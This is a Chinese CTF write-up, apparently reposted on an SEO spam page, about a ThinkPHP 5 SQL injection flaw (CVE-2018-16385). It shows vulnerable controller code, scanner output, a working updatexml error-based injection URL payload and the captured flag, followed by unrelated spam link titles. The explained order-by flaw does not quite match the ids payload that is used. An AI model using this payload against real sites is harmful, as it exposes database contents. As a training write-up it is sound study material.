当前位置: 首页 > news >正文

flash网站做seo优化好不好网络广告的特点

flash网站做seo优化好不好,网络广告的特点,阿里百秀网站,乐都营销型网站建设目录 漏洞描述 漏洞分析 漏洞复现 漏洞描述 漏洞发现时间&#xff1a; 2018-09-04 CVE 参考&#xff1a;CVE-2018-16385 最高严重级别&#xff1a;低风险 受影响的系统&#xff1a;ThinkPHP < 5.1.23 漏洞描述&#xff1a; ThinkPHP是一款快速、兼容、简单的轻量级国产P…

目录

漏洞描述

漏洞分析

漏洞复现

漏洞描述

漏洞发现时间: 2018-09-04

CVE 参考:CVE-2018-16385

最高严重级别:低风险

受影响的系统:ThinkPHP < 5.1.23

漏洞描述:

ThinkPHP是一款快速、兼容、简单的轻量级国产PHP开发矿场,解决了大部分应用开发的需求。

该漏洞与程序没有正确过滤数组的Key值,导致在public/index/index/test/index中查询字符串时出现SQL注入漏洞有关。攻击者可以利用该漏洞获取数据库中当前用户名等数据。


漏洞分析

<?php
namespace app\index\controller;class Test
{public function index(){$data=array();$data['username']=array('eq','admin');$order=input('get.order');//使用input函数进行安全过滤$m=db('user')->where($data)->order($order)->find();dump($m);}
}

漏洞原因是处理order by参数时,如果参数用户是可控的,当参数为数组key value时,未正确过滤处理数组的key值,就会导致漏洞的产生。


首先定义了一个Test类,该类包含一个名为index的公共方法。在该方法中,首先创建了一个空数组$data。然后,将值为`array('eq', 'admin')`的一维数组赋给$data['username'],即$data数组中的一个元素。接下来,使用`input('get.order')`语句获取来自GET请求的`order`参数,并将其赋给$order变量。需要注意的是,这里使用了input函数对输入数据进行了安全过滤。接下来,代码使用$db('user')->where($data)语句查询数据库中满足$data条件的数据。然后,使用$order变量对查询结果进行排序,最后使用find()方法返回查询结果的第一个匹配项,并将其存储在$m变量中。最后使用dump函数打印$m变量的内容。


漏洞复现

payload[!] Name: ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure VulnerabilityScript: thinkphp5_sqli.pyUrl: http://node5.buuoj.cn:29791/Vulnerable: TrueMethod: GETPayload: http://node5.buuoj.cn:29791/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

经过poc验证,此版本的thinkphp存在sql注入漏洞!



 


 flag{1ffdbdc4-020e-4d98-bb49-ccabed232769}

ThinkPHP5 SQL注入漏洞 && PDO真/伪预处理分析 | 离别歌 (leavesongs.com)icon-default.png?t=N7T8https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

 具体漏洞分析!

http://www.mmbaike.com/news/24672.html

相关文章:

  • 用vs做网站原型44555pd永久四色端口
  • 湖北正规网站建设检修新媒体营销推广方案
  • 网站的外链接数域名注册信息查询
  • 做网站好吗百度网站大全首页
  • 录像网站怎么做互联网营销怎么赚钱
  • 网站底部固定广告代码新站如何快速收录
  • 网站电子签名怎么做做推广的公司一般都叫什么
  • mac服务器 做网站fifa最新世界排名
  • 任何用c语言做网站网站搜索优化
  • 微信公众号商城网站开发竞价外包代运营公司
  • 电子商务网站建设方案书的总结上海百度推广优化排名
  • 手机输入网址怎么输入标题关键词优化报价
  • 做PPT哪个网站的素材多点蜗牛精灵seo
  • 网站制作平台能赚钱吗十大免费最亏的免费app
  • 郑州网站开发定制网站seo课程
  • 门户网站开发要多久新网站排名优化怎么做
  • 长沙百度网站制作seo基础教程
  • 制作充值网站品牌营销经典案例
  • 网站开发下载哪个绍兴seo计费管理
  • 长春做网站wang百度搜索风云榜小说排行榜
  • 关于政府网站群建设的咨询函steam交易链接怎么用
  • 手机网站 排版郑州网站建设制作
  • 做全屏式网站尺寸是多大网址收录网站
  • 百度做网站哪里可以学百度网络小说排行榜
  • 学网站开发看什么书seo网络推广方法
  • 做庭院景观的那个网站推广好网站搜索引擎优化
  • 网站开发服务费属于哪种进项舆情分析报告
  • 学做网站初入门教程网络营销推广方案有哪些
  • 淘宝官方网站登录页面网站seo服务
  • 网站建设做的好的公司网站seo博客